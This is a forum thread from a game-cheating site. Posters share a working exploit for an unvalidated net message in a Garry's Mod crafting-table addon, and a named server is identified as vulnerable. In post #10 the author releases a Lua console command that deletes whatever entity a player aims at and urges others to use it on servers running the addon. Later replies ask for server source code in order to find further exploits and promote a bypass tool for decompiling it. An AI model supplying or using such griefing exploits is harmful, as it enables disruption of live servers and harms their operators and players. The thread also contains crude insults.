Results 1 to 14 of 14
  1. #1
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990

    [Exploit] Crafting table addon exploit

    I found this exploit on FlameRP server, they have a shitty crafting table addon. One of the net messages is
    Code:
    net.Start("DestroyTable")
    net.WriteEntity(self)
    net.SendToServer()
    The server side part of code obviously does not check anything about the entity because when i ran it with a ents.GetAll() I crashed everyone on server. If you don't know how to script post a server this works on and I will send you simple script.

  2. #2
    JustCozzYT's Avatar
    Join Date
    Jan 2015
    Gender
    male
    Location
    By the ghetto
    Posts
    8
    Reputation
    10
    Thanks
    3
    My Mood
    Innocent
    Quote Originally Posted by Gorzoid View Post
    I found this exploit on FlameRP server, they have a shitty crafting table addon. One of the net messages is
    Code:
    net.Start("DestroyTable")
    net.WriteEntity(self)
    net.SendToServer()
    The server side part of code obviously does not check anything about the entity because when i ran it with a ents.GetAll() I crashed everyone on server. If you don't know how to script post a server this works on and I will send you simple script.
    Can u help me excatly how do i use this?

  3. #3
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990
    Quote Originally Posted by JustCozzYT View Post
    Can u help me excatly how do i use this?

    Quote Originally Posted by Gorzoid View Post
    If you don't know how to script post a server this works on and I will send you simple script.
    I would rather not, but if many people respond saying they are clueless I will publicly post it. Learn lua guys, its easy I got this far in less than a month.

  4. #4
    TheLegenderyCat's Avatar
    Join Date
    Jul 2012
    Gender
    male
    Posts
    52
    Reputation
    80
    Thanks
    136
    Quote Originally Posted by Gorzoid View Post
    I found this exploit on FlameRP server, they have a shitty crafting table addon. One of the net messages is
    Code:
    net.Start("DestroyTable")
    net.WriteEntity(self)
    net.SendToServer()
    The server side part of code obviously does not check anything about the entity because when i ran it with a ents.GetAll() I crashed everyone on server. If you don't know how to script post a server this works on and I will send you simple script.
    I think a lot of people have this lol.

  5. #5
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990
    Quote Originally Posted by TheLegenderyCat View Post
    I think a lot of people have this lol.
    Good then I don't need to share my shitty target and delete script.

  6. #6
    Scetch08's Avatar
    Join Date
    Sep 2012
    Gender
    male
    Location
    your hallucinations
    Posts
    101
    Reputation
    10
    Thanks
    107
    My Mood
    Lurking
    I'd like to have a share at your target and delete script . Nice find btw.

  7. #7
    suchisgood's Avatar
    Join Date
    Feb 2014
    Gender
    female
    Posts
    902
    Reputation
    10
    Thanks
    559
    My Mood
    Angelic
    Quote Originally Posted by Gorzoid View Post
    Good then I don't need to share my shitty target and delete script.
    Get me the cache for the server i'll see if there is any exploits in there i can decompile it in your gaysrrmod/cache/lua folder.

  8. #8
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990
    Quote Originally Posted by suchisgood View Post
    Get me the cache for the server i'll see if there is any exploits in there i can decompile it in your gaysrrmod/cache/lua folder.
    I can decompile myself, gdaap bypasser lets u decompile it all, i love it

  9. #9
    loli2361's Avatar
    Join Date
    May 2014
    Gender
    male
    Location
    pengis
    Posts
    77
    Reputation
    10
    Thanks
    39
    My Mood
    Yeehaw
    gdaap, ruler of gmod bypasses so far @kasperbjerby
    proud skid since 2013

  10. #10
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990
    meah fuk it go nuts on the few servers that have it
    Code:
    concommand.Add("begone", function()
    local t = LocalPlayer():GetEyeTrace().Entity
    if t:GetClass() == "worldspawn" then return end
    net.Start("DestroyTable")
    			net.WriteEntity(t)
    			net.SendToServer()
    end )

  11. #11
    suchisgood's Avatar
    Join Date
    Feb 2014
    Gender
    female
    Posts
    902
    Reputation
    10
    Thanks
    559
    My Mood
    Angelic
    Quote Originally Posted by Gorzoid View Post
    meah fuk it go nuts on the few servers that have it
    Code:
    concommand.Add("begone", function()
    local t = LocalPlayer():GetEyeTrace().Entity
    if t:GetClass() == "worldspawn" then return end
    net.Start("DestroyTable")
    			net.WriteEntity(t)
    			net.SendToServer()
    end )
    Lol crash the server if you remove worldspawn GG

    Quote Originally Posted by Gorzoid View Post
    I can decompile myself, gdaap bypasser lets u decompile it all, i love it
    I wanted the source code so i could exploit it..

  12. #12
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990
    Quote Originally Posted by suchisgood View Post
    Lol crash the server if you remove worldspawn GG

    I wanted the source code so i could exploit it..
    Yeah, i added the if statement just so its not too destructive. But if u really want the client files get gdaap, wont let me add attachment so i cant upload
    Last edited by Gorzoid; 01-25-2015 at 10:32 AM. Reason: Cant upload

  13. #13
    suchisgood's Avatar
    Join Date
    Feb 2014
    Gender
    female
    Posts
    902
    Reputation
    10
    Thanks
    559
    My Mood
    Angelic
    Quote Originally Posted by Gorzoid View Post
    Yeah, i added the if statement just so its not too destructive. But if u really want the client files get gdaap, wont let me add attachment so i cant upload
    Why not just upload to s o l i d f i l e s . c o m and send in pm?

  14. #14
    Kona-chan's Avatar
    Join Date
    Oct 2014
    Gender
    female
    Posts
    380
    Reputation
    22
    Thanks
    685
    Quote Originally Posted by loli2361 View Post
    gdaap, ruler of gmod bypasses so far @kasperbjerby
    stop sucking his cock, his bypasser sucks balls

  15. The Following 2 Users Say Thank You to Kona-chan For This Useful Post:

    Scetch08 (01-27-2015),suchisgood (01-25-2015)

Similar Threads

  1. [Release] health and armor addon exploit
    By Im Friendly in forum Garry's Mod Hacks & Cheats
    Replies: 6
    Last Post: 01-16-2015, 04:49 PM
  2. [Info] report addon exploit
    By Trollaux in forum Garry's Mod Coding & Resources
    Replies: 20
    Last Post: 12-30-2014, 03:50 PM
  3. Finding Addon Exploits?
    By Ammart in forum Garry's Mod Discussions & Help
    Replies: 1
    Last Post: 05-15-2013, 12:31 PM
  4. 7K ZP exploit [My 1 ST Exploit ]
    By rapciess09 in forum CrossFire Tutorials
    Replies: 13
    Last Post: 10-06-2010, 06:05 PM